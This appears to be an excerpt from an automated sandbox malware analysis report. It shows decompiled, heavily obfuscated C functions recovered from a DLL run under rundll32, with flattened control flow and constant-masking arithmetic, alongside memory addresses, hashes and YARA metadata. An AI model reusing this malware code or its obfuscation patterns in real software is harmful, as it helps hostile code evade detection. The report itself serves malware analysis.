				E002E20B9(_t136);
				_v52 = 0x4b44d9;
				_t171 =  &(( &_v68)[6]);
				_t165 = 0;
				_t154 = 0x40ad1f2;
				_t166 = 0x41;
				_v52 = _v52 * 0x5c;
				_v52 = _v52 ^ 0xd486af61;
				_v52 = _v52 ^ 0xcf8a129f;
				_v24 = 0x8b17cc;
				_v24 = _v24 + 0xffff02b5;
				_v24 = _v24 ^ 0x008a1a91;
				_v64 = 0xcc4e1;
				_v64 = _v64 ^ 0x71537a57;
				_v64 = _v64 | 0xbc84d226;
				_v64 = _v64 + 0x8a58;
				_v64 = _v64 ^ 0xbde0890e;
				_v12 = 0x10173e;
				_v12 = _v12 / _t166;
				_v12 = _v12 ^ 0x000bb2e7;
				_v16 = 0xcbf18d;
				_v16 = _v16 + 0x7f8c;
				_v16 = _v16 ^ 0x00cd0dea;
				_v20 = 0x7a67ce;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00fa626e;
				_v68 = 0x7779f8;
				_v68 = _v68 + 0xa85e;
				_v68 = _v68 << 0x10;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x0443aeb4;
				_v28 = 0xee6391;
				_v28 = _v28 ^ 0x2bfa2339;
				_v28 = _v28 ^ 0x2b1bacd2;
				_v32 = 0x87b642;
				_v32 = _v32 + 0xffff3baa;
				_v32 = _v32 ^ 0x008fda80;
				_v36 = 0x3b697f;
				_v36 = _v36 | 0x5675f49c;
				_v36 = _v36 ^ 0x5679bffa;
				_v40 = 0x254a84;
				_v40 = _v40 * 0x67;
				_v40 = _v40 ^ 0x0f0bd396;
				_v44 = 0xfc206d;
				_v44 = _v44 * 0x45;
				_v44 = _v44 ^ 0x43f6aa11;
				_v56 = 0x3dd941;
				_v56 = _v56 ^ 0x94d2d45c;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x00419011;
				_v4 = 0xdcf5c3;
				_v4 = _v4 ^ 0x0d464ae6;
				_v4 = _v4 ^ 0x0d938ce3;
				_v60 = 0xe23f0;
				_v60 = _v60 ^ 0x0435e191;
				_v60 = _v60 ^ 0xbde67646;
				_v60 = _v60 ^ 0xb922f804;
				_v60 = _v60 ^ 0x00f2260b;
				_v8 = 0x523a90;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x259e6962;
				_v48 = 0x46565e;
				_t167 = 3;
				_v48 = _v48 * 0x6a;
				_t168 = _v4;
				_v48 = _v48 / _t167;
				_v48 = _v48 ^ 0x09b4f31e;
				do {
					while(_t154 != 0x40ad1f2) {
						if(_t154 == 0x458d12f) {
							_t147 = E002D8F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
							_t168 = _t147;
							_t171 =  &(_t171[0xa]);
							if(_t147 != 0xffffffff) {
								_t154 = 0x4af2a99;
								continue;
							}
						} else {
							if(_t154 == 0x4af2a99) {
								_t150 = E002D19B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
								_t171 =  &(_t171[8]);
								_t165 = _t150;
								_t154 = 0xe5b5021;
								continue;
							} else {
								if(_t154 != 0xe5b5021) {
									goto L11;
								} else {
									E002E1E67(_v4, _v60, _v8, _v48, _t168);
								}
							}
						}
						L6:
						return _t165;
					}
					_t154 = 0x458d12f;
					L11:
				} while (_t154 != 0xd2f352d);
				goto L6;
			}





























                                                                                                                                  0x002deaa0
                                                                                                                                  0x002deaa4
                                                                                                                                  0x002deaa6
                                                                                                                                  0x002deaaa
                                                                                                                                  0x002deaae
                                                                                                                                  0x002deab2
                                                                                                                                  0x002deab3
                                                                                                                                  0x002deab4
                                                                                                                                  0x002deab9
                                                                                                                                  0x002deac1
                                                                                                                                  0x002deacb
                                                                                                                                  0x002deacd
                                                                                                                                  0x002dead4
                                                                                                                                  0x002dead5
                                                                                                                                  0x002dead9
                                                                                                                                  0x002deae1
                                                                                                                                  0x002deae9
                                                                                                                                  0x002deaf1
                                                                                                                                  0x002deaf9
                                                                                                                                  0x002deb01
                                                                                                                                  0x002deb09
                                                                                                                                  0x002deb11
                                                                                                                                  0x002deb19
                                                                                                                                  0x002deb21
                                                                                                                                  0x002deb29
                                                                                                                                  0x002deb37
                                                                                                                                  0x002deb3b
                                                                                                                                  0x002deb43
                                                                                                                                  0x002deb4b
                                                                                                                                  0x002deb53
                                                                                                                                  0x002deb5b
                                                                                                                                  0x002deb63
                                                                                                                                  0x002deb67
                                                                                                                                  0x002deb6f
                                                                                                                                  0x002deb77
                                                                                                                                  0x002deb7f
                                                                                                                                  0x002deb84
                                                                                                                                  0x002deb89
                                                                                                                                  0x002deb91
                                                                                                                                  0x002deb99
                                                                                                                                  0x002deba1
                                                                                                                                  0x002deba9
                                                                                                                                  0x002debb1
                                                                                                                                  0x002debb9
                                                                                                                                  0x002debc1
                                                                                                                                  0x002debc9
                                                                                                                                  0x002debd1
                                                                                                                                  0x002debd9
                                                                                                                                  0x002debe6
                                                                                                                                  0x002debea
                                                                                                                                  0x002debf2
                                                                                                                                  0x002debff
                                                                                                                                  0x002dec03
                                                                                                                                  0x002dec0b
                                                                                                                                  0x002dec13
                                                                                                                                  0x002dec1b
                                                                                                                                  0x002dec20
                                                                                                                                  0x002dec28
                                                                                                                                  0x002dec30
                                                                                                                                  0x002dec38
                                                                                                                                  0x002dec40
                                                                                                                                  0x002dec48
                                                                                                                                  0x002dec50
                                                                                                                                  0x002dec58
                                                                                                                                  0x002dec60
                                                                                                                                  0x002dec68
                                                                                                                                  0x002dec75
                                                                                                                                  0x002dec79
                                                                                                                                  0x002dec81
                                                                                                                                  0x002dec92
                                                                                                                                  0x002dec98
                                                                                                                                  0x002deca2
                                                                                                                                  0x002deca6
                                                                                                                                  0x002decaa
                                                                                                                                  0x002decb2
                                                                                                                                  0x002decb2
                                                                                                                                  0x002decc0
                                                                                                                                  0x002ded52
                                                                                                                                  0x002ded57
                                                                                                                                  0x002ded59
                                                                                                                                  0x002ded5f
                                                                                                                                  0x002ded61
                                                                                                                                  0x00000000
                                                                                                                                  0x002ded61
                                                                                                                                  0x002decc2
                                                                                                                                  0x002decc8
                                                                                                                                  0x002ded16
                                                                                                                                  0x002ded1b
                                                                                                                                  0x002ded1e
                                                                                                                                  0x002ded20
                                                                                                                                  0x00000000
                                                                                                                                  0x002decca
                                                                                                                                  0x002decd0
                                                                                                                                  0x00000000
                                                                                                                                  0x002decd6
                                                                                                                                  0x002dece7
                                                                                                                                  0x002decec
                                                                                                                                  0x002decd0
                                                                                                                                  0x002decc8
                                                                                                                                  0x002decef
                                                                                                                                  0x002decf8
                                                                                                                                  0x002decf8
                                                                                                                                  0x002ded6b
                                                                                                                                  0x002ded6d
                                                                                                                                  0x002ded6d
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: -5/$WzSq$^VF$JF
                                                                                                                                  • API String ID: 0-2399144359
                                                                                                                                  • Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                                  • Instruction ID: 5165920699abf8d61a7732a0d098cf965de53971e8fe174dff331e9655865f62
                                                                                                                                  • Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                                  • Instruction Fuzzy Hash: A67122710183419BCB58DF65C98681BBBF2FBC8758F504A1EF69696220C3B1DA58DF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E9BCF Relevance: 5.1, Strings: 4, Instructions: 133COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E002E9BCF() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				unsigned int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t111;
				signed int _t115;
				signed int _t117;
				void* _t118;
				signed int _t132;
				void* _t134;
				signed int _t135;
				signed int* _t136;

				_t136 =  &_v568;
				_v560 = 0x297e3c;
				_v560 = _v560 >> 9;
				_t118 = 0x4ead2fe;
				_v560 = _v560 + 0xe8be;
				_v560 = _v560 ^ 0xc9c09221;
				_v560 = _v560 ^ 0xc9c20db8;
				_v540 = 0x190e1d;
				_v540 = _v540 >> 7;
				_v540 = _v540 >> 0xd;
				_v540 = _v540 ^ 0x000cdd3b;
				_v544 = 0x86c2f0;
				_v544 = _v544 | 0x0d7eac20;
				_v544 = _v544 ^ 0xe6b61282;
				_v544 = _v544 ^ 0xeb41e563;
				_v552 = 0x262f60;
				_v552 = _v552 ^ 0x76c91adc;
				_v552 = _v552 + 0xd1c5;
				_v552 = _v552 ^ 0x76fc323e;
				_v524 = 0xf427e0;
				_v524 = _v524 + 0xffff22a3;
				_v524 = _v524 ^ 0x00f85f52;
				_v548 = 0xdbc1a5;
				_v548 = _v548 >> 0xb;
				_v548 = _v548 + 0xf615;
				_v548 = _v548 ^ 0x0006ff3e;
				_v556 = 0xd2f840;
				_v556 = _v556 * 0x5f;
				_t134 = 0;
				_v556 = _v556 ^ 0x4e4cccaa;
				_v568 = 0x74ecfa;
				_t132 = 0x53;
				_t133 = _v556;
				_v568 = _v568 / _t132;
				_v568 = _v568 ^ 0xc72664ff;
				_v568 = _v568 << 0xf;
				_v568 = _v568 ^ 0x862d9f40;
				_v536 = 0xc0d44a;
				_v536 = _v536 + 0x396d;
				_t135 = _v556;
				_t117 = _v556;
				_v536 = _v536 * 0x46;
				_v536 = _v536 ^ 0x34c6c601;
				_v532 = 0xf37e83;
				_v532 = _v532 << 8;
				_v532 = _v532 | 0x760e0a19;
				_v532 = _v532 ^ 0xf77c332a;
				_v528 = 0x91f8e3;
				_v528 = _v528 ^ 0xc904aca2;
				_v528 = _v528 ^ 0xc9900919;
				do {
					while(_t118 != 0x27fe330) {
						if(_t118 == 0x4ead2fe) {
							_t118 = 0x96d401d;
							continue;
						} else {
							if(_t118 == 0x7ac597b) {
								_t117 = E002DB6CF( &_v520, _v548, _v556, _v568);
								_t118 = 0xa7595e6;
								continue;
							} else {
								if(_t118 == 0x80b0e4e) {
									_t90 =  &_v552; // 0xeb41e563
									_t111 = E002D9B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
									_t136 =  &(_t136[4]);
									__eflags = _t111;
									if(__eflags != 0) {
										_t118 = 0x7ac597b;
										continue;
									}
								} else {
									if(_t118 == 0x96d401d) {
										_t115 = E002D52C2();
										_t133 = _t115;
										__eflags = _t115;
										if(__eflags != 0) {
											_t118 = 0x80b0e4e;
											continue;
										}
									} else {
										if(_t118 != 0xa7595e6) {
											goto L15;
										} else {
											_t135 = E002D2051(_v532, _t117, _v528);
											_t118 = 0x27fe330;
											continue;
										}
									}
								}
							}
						}
						goto L16;
					}
					_v564 = 0x69bdc3;
					_v564 = _v564 | 0xfd1bce6c;
					_v564 = _v564 ^ 0xf153ffb6;
					_v564 = _v564 ^ 0x260f00bb;
					__eflags = _t135 - _v564;
					_t134 =  ==  ? 1 : _t134;
					_t118 = 0x8b668cc;
					L15:
					__eflags = _t118 - 0x8b668cc;
				} while (__eflags != 0);
				L16:
				return _t134;
			}
























                                                                                                                                  0x002e9bcf
                                                                                                                                  0x002e9bd9
                                                                                                                                  0x002e9be3
                                                                                                                                  0x002e9be8
                                                                                                                                  0x002e9bed
                                                                                                                                  0x002e9bf5
                                                                                                                                  0x002e9bfd
                                                                                                                                  0x002e9c05
                                                                                                                                  0x002e9c0d
                                                                                                                                  0x002e9c12
                                                                                                                                  0x002e9c17
                                                                                                                                  0x002e9c1f
                                                                                                                                  0x002e9c27
                                                                                                                                  0x002e9c2f
                                                                                                                                  0x002e9c37
                                                                                                                                  0x002e9c3f
                                                                                                                                  0x002e9c47
                                                                                                                                  0x002e9c4f
                                                                                                                                  0x002e9c57
                                                                                                                                  0x002e9c5f
                                                                                                                                  0x002e9c67
                                                                                                                                  0x002e9c6f
                                                                                                                                  0x002e9c77
                                                                                                                                  0x002e9c7f
                                                                                                                                  0x002e9c84
                                                                                                                                  0x002e9c8c
                                                                                                                                  0x002e9c94
                                                                                                                                  0x002e9ca1
                                                                                                                                  0x002e9ca5
                                                                                                                                  0x002e9ca7
                                                                                                                                  0x002e9caf
                                                                                                                                  0x002e9cbd
                                                                                                                                  0x002e9cc0
                                                                                                                                  0x002e9cc4
                                                                                                                                  0x002e9cc8
                                                                                                                                  0x002e9cd0
                                                                                                                                  0x002e9cd5
                                                                                                                                  0x002e9cdd
                                                                                                                                  0x002e9ce5
                                                                                                                                  0x002e9cf2
                                                                                                                                  0x002e9cf6
                                                                                                                                  0x002e9cfa
                                                                                                                                  0x002e9cfe
                                                                                                                                  0x002e9d06
                                                                                                                                  0x002e9d0e
                                                                                                                                  0x002e9d13
                                                                                                                                  0x002e9d1b
                                                                                                                                  0x002e9d23
                                                                                                                                  0x002e9d2b
                                                                                                                                  0x002e9d33
                                                                                                                                  0x002e9d3b
                                                                                                                                  0x002e9d3b
                                                                                                                                  0x002e9d4d
                                                                                                                                  0x002e9e02
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9d53
                                                                                                                                  0x002e9d59
                                                                                                                                  0x002e9df6
                                                                                                                                  0x002e9df8
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9d5f
                                                                                                                                  0x002e9d65
                                                                                                                                  0x002e9dc1
                                                                                                                                  0x002e9dc9
                                                                                                                                  0x002e9dce
                                                                                                                                  0x002e9dd1
                                                                                                                                  0x002e9dd3
                                                                                                                                  0x002e9dd5
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9dd5
                                                                                                                                  0x002e9d67
                                                                                                                                  0x002e9d6d
                                                                                                                                  0x002e9da0
                                                                                                                                  0x002e9da5
                                                                                                                                  0x002e9da7
                                                                                                                                  0x002e9da9
                                                                                                                                  0x002e9daf
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9daf
                                                                                                                                  0x002e9d6f
                                                                                                                                  0x002e9d75
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9d7b
                                                                                                                                  0x002e9d8f
                                                                                                                                  0x002e9d91
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9d91
                                                                                                                                  0x002e9d75
                                                                                                                                  0x002e9d6d
                                                                                                                                  0x002e9d65
                                                                                                                                  0x002e9d59
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9d4d
                                                                                                                                  0x002e9e0c
                                                                                                                                  0x002e9e16
                                                                                                                                  0x002e9e1f
                                                                                                                                  0x002e9e27
                                                                                                                                  0x002e9e33
                                                                                                                                  0x002e9e35
                                                                                                                                  0x002e9e38
                                                                                                                                  0x002e9e3d
                                                                                                                                  0x002e9e3d
                                                                                                                                  0x002e9e3d
                                                                                                                                  0x002e9e4a
                                                                                                                                  0x002e9e55

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: <~)$`/&$cA$m9
                                                                                                                                  • API String ID: 0-2671356241
                                                                                                                                  • Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                                  • Instruction ID: 260d84ef838b759f5b81999b37c3d5328a31483948e7c171b3649e848feb0016
                                                                                                                                  • Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                                  • Instruction Fuzzy Hash: BD5175710183429FC398CE22D49542BBBE1FFD8758F901D1EF5A692260C3B4CA998F82
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D9B83 Relevance: 5.1, Strings: 4, Instructions: 109COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                  			E002D9B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _v64;
				intOrPtr _v68;
				void* _t115;
				signed int _t130;
				signed int _t131;
				void* _t133;

				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(_a4);
				_push(0x104);
				_push(__ecx);
				E002E20B9(0x104);
				_v68 = 0x342964;
				asm("stosd");
				_t133 = 0;
				asm("stosd");
				asm("stosd");
				_v40 = 0xa3a3c;
				_v40 = _v40 + 0x2c25;
				_v40 = _v40 ^ 0x000a7661;
				_v16 = 0x75ee44;
				_t130 = 0x7a;
				_v16 = _v16 / _t130;
				_v16 = _v16 ^ 0xc9e42672;
				_v16 = _v16 ^ 0xc9e58a7e;
				_v8 = 0x386b92;
				_v8 = _v8 << 4;
				_v8 = _v8 | 0x0ec9a536;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x000b4478;
				_v44 = 0xd66787;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x001d593f;
				_v24 = 0x7c5a73;
				_v24 = _v24 | 0xae316990;
				_t131 = 0x19;
				_v24 = _v24 / _t131;
				_v24 = _v24 ^ 0x06f0967a;
				_v20 = 0x3dfd52;
				_v20 = _v20 >> 8;
				_v20 = _v20 * 0x24;
				_v20 = _v20 ^ 0x0009affd;
				_v12 = 0xf0c6a5;
				_v12 = _v12 + 0xffff2be4;
				_v12 = _v12 + 0x1686;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x03c3840c;
				_v48 = 0x30c967;
				_v48 = _v48 | 0xcae095b2;
				_v48 = _v48 ^ 0xcaf7f966;
				_v36 = 0xabcbdc;
				_v36 = _v36 + 0xfffff856;
				_v36 = _v36 | 0xb2b71321;
				_v36 = _v36 ^ 0xb2b3c312;
				_v32 = 0xda8dbe;
				_v32 = _v32 + 0xffff364b;
				_v32 = _v32 | 0x02598b37;
				_v32 = _v32 ^ 0x02d31c0a;
				_v28 = 0x528ee8;
				_v28 = _v28 * 0x12;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x17383776;
				_t115 = E002D91DD(__ecx, _v40, __ecx);
				_t132 = _t115;
				if(_t115 != 0) {
					_t133 = E002D76AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
					E002E1E67(_v48, _v36, _v32, _v28, _t132);
				}
				return _t133;
			}





















                                                                                                                                  0x002d9b8b
                                                                                                                                  0x002d9b93
                                                                                                                                  0x002d9b96
                                                                                                                                  0x002d9b99
                                                                                                                                  0x002d9b9c
                                                                                                                                  0x002d9b9f
                                                                                                                                  0x002d9ba0
                                                                                                                                  0x002d9ba1
                                                                                                                                  0x002d9ba6
                                                                                                                                  0x002d9bb4
                                                                                                                                  0x002d9bb5
                                                                                                                                  0x002d9bb9
                                                                                                                                  0x002d9bba
                                                                                                                                  0x002d9bbb
                                                                                                                                  0x002d9bc2
                                                                                                                                  0x002d9bc9
                                                                                                                                  0x002d9bd0
                                                                                                                                  0x002d9bda
                                                                                                                                  0x002d9bdf
                                                                                                                                  0x002d9be4
                                                                                                                                  0x002d9beb
                                                                                                                                  0x002d9bf2
                                                                                                                                  0x002d9bf9
                                                                                                                                  0x002d9bfd
                                                                                                                                  0x002d9c04
                                                                                                                                  0x002d9c08
                                                                                                                                  0x002d9c0f
                                                                                                                                  0x002d9c16
                                                                                                                                  0x002d9c1a
                                                                                                                                  0x002d9c21
                                                                                                                                  0x002d9c28
                                                                                                                                  0x002d9c32
                                                                                                                                  0x002d9c38
                                                                                                                                  0x002d9c3b
                                                                                                                                  0x002d9c42
                                                                                                                                  0x002d9c49
                                                                                                                                  0x002d9c52
                                                                                                                                  0x002d9c55
                                                                                                                                  0x002d9c5c
                                                                                                                                  0x002d9c63
                                                                                                                                  0x002d9c6a
                                                                                                                                  0x002d9c71
                                                                                                                                  0x002d9c75
                                                                                                                                  0x002d9c7c
                                                                                                                                  0x002d9c83
                                                                                                                                  0x002d9c8a
                                                                                                                                  0x002d9c91
                                                                                                                                  0x002d9c98
                                                                                                                                  0x002d9c9f
                                                                                                                                  0x002d9ca6
                                                                                                                                  0x002d9cad
                                                                                                                                  0x002d9cb4
                                                                                                                                  0x002d9cbb
                                                                                                                                  0x002d9cc2
                                                                                                                                  0x002d9cc9
                                                                                                                                  0x002d9cd4
                                                                                                                                  0x002d9cd7
                                                                                                                                  0x002d9cdb
                                                                                                                                  0x002d9ceb
                                                                                                                                  0x002d9cf3
                                                                                                                                  0x002d9cf7
                                                                                                                                  0x002d9d16
                                                                                                                                  0x002d9d21
                                                                                                                                  0x002d9d26
                                                                                                                                  0x002d9d30

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Du$av$d)4$sZ|
                                                                                                                                  • API String ID: 0-269012183
                                                                                                                                  • Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                                  • Instruction ID: 4a605d31ef6e404335e70239bb1561e4b1e448b48068713a1d4bdcb299d565c6
                                                                                                                                  • Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                                  • Instruction Fuzzy Hash: 5C5102B1D00209EBDF09DFE5C94A8EEBBB1FB48318F108159E412B6260D3755A59DFA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10043730 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                                  • GetACP.KERNEL32 ref: 1004377E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4232894706-0
                                                                                                                                  • Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                                  • Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
                                                                                                                                  • Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                                  • Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10018C9A Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                                  • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                                  • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                                  • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E0E53 Relevance: 4.1, Strings: 3, Instructions: 343COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002E0E53(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t406;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t435;
				void* _t467;
				void* _t468;
				signed int* _t472;

				_t472 =  &_v2772;
				_v2700 = 0xd36ba7;
				_v2700 = _v2700 << 7;
				_v2700 = _v2700 ^ 0xaed70c65;
				_v2700 = _v2700 ^ 0xc762dfcc;
				_v2652 = 0x6f4609;
				_t9 =  &_v2652; // 0x6f4609
				_v2652 =  *_t9 * 0x1c;
				_t467 = __ecx;
				_v2652 = _v2652 ^ 0x0c23569d;
				_t468 = 0xea1969c;
				_v2608 = 0xb8394b;
				_v2608 = _v2608 + 0xaeb5;
				_v2608 = _v2608 ^ 0x00b390c3;
				_v2736 = 0x3d33f1;
				_v2736 = _v2736 + 0xffffd537;
				_v2736 = _v2736 + 0xffffb6ee;
				_v2736 = _v2736 + 0xbad8;
				_v2736 = _v2736 ^ 0x003e0409;
				_v2768 = 0xd1d4ce;
				_v2768 = _v2768 >> 0xc;
				_v2768 = _v2768 ^ 0xb5c37fe4;
				_v2768 = _v2768 + 0x4eb3;
				_v2768 = _v2768 ^ 0xb5c2c9c4;
				_v2760 = 0x157bbd;
				_v2760 = _v2760 ^ 0x6d7617e7;
				_v2760 = _v2760 ^ 0x1b56cd2f;
